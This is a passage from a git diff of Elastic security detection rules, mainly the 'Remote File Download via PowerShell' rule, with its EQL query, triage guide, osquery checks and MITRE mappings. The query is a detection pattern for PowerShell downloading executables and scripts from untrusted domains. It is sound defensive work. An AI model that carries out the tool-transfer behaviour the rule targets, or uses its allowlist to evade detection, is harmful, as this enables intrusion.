(IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and\n not user.domain : \"NT AUTHORITY\"]\n [file where host.os.type == \"windows\" and process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_108.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_108.json index 81d37018749..db97c68b75e 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_108.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_108.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=30s\n\n[network where host.os.type == \"windows\" and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\n \"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\",\n \"*.windowsupdate.com\", \"metadata.google.internal\", \"dist.nuget.org\",\n \"artifacts.elastic.co\", \"*.digicert.com\", \"packages.chocolatey.org\",\n \"outlook.office365.com\"\n ) and not user.id : \"S-1-5-18\"]\n[file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"powershell.exe\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_109.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_109.json new file mode 100644 index 00000000000..74321ef3e6b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_109.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies powershell.exe being used to download an executable file from an untrusted remote destination.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=30s\n\n[network where host.os.type == \"windows\" and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\n \"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\",\n \"*.windowsupdate.com\", \"metadata.google.internal\", \"dist.nuget.org\",\n \"artifacts.elastic.co\", \"*.digicert.com\", \"packages.chocolatey.org\",\n \"outlook.office365.com\"\n ) and not user.id : \"S-1-5-18\"]\n[file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"powershell.exe\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "33f306e8-417c-411b-965c-c2812d6d3f4d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "33f306e8-417c-411b-965c-c2812d6d3f4d_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/342f834b-21a6-41bf-878c-87d116eba3ee_1.json b/packages/security_detection_engine/kibana/security_rule/342f834b-21a6-41bf-878c-87d116eba3ee_1.json index 21e374fdcf8..2a82a52ff50 100644 --- a/packages/security_detection_engine/kibana/security_rule/342f834b-21a6-41bf-878c-87d116eba3ee_1.json +++ b/packages/security_detection_engine/kibana/security_rule/342f834b-21a6-41bf-878c-87d116eba3ee_1.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/345889c4-23a8-4bc0-b7ca-756bd17ce83b_1.json b/packages/security_detection_engine/kibana/security_rule/345889c4-23a8-4bc0-b7ca-756bd17ce83b_1.json index 6d4556db5da..71d82704193 100644 --- a/packages/security_detection_engine/kibana/security_rule/345889c4-23a8-4bc0-b7ca-756bd17ce83b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/345889c4-23a8-4bc0-b7ca-756bd17ce83b_1.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_102.json b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_102.json index 6110935b72f..d3a3cbf3db2 100644 --- a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_102.json +++ b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -70,7 +70,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_103.json b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_103.json index 48dad282d27..0eb62938289 100644 --- a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_103.json +++ b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -60,7 +60,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_104.json b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_104.json index e41d90ce23a..3f5918450cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_104.json +++ b/packages/security_detection_engine/kibana/security_rule/34fde489-94b0-4500-a76f-b8a157cf9269_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -72,7 +72,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_102.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_102.json index 6049160a246..0e89b56a0f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_102.json +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_103.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_103.json index 472780974e0..829ee5f63f3 100644 --- a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_103.json +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_104.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_104.json index 3e86fec8f83..6be58793a94 100644 --- a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_104.json +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_105.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_105.json index 37d80e03766..8a3fb51d08a 100644 --- a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_105.json +++ 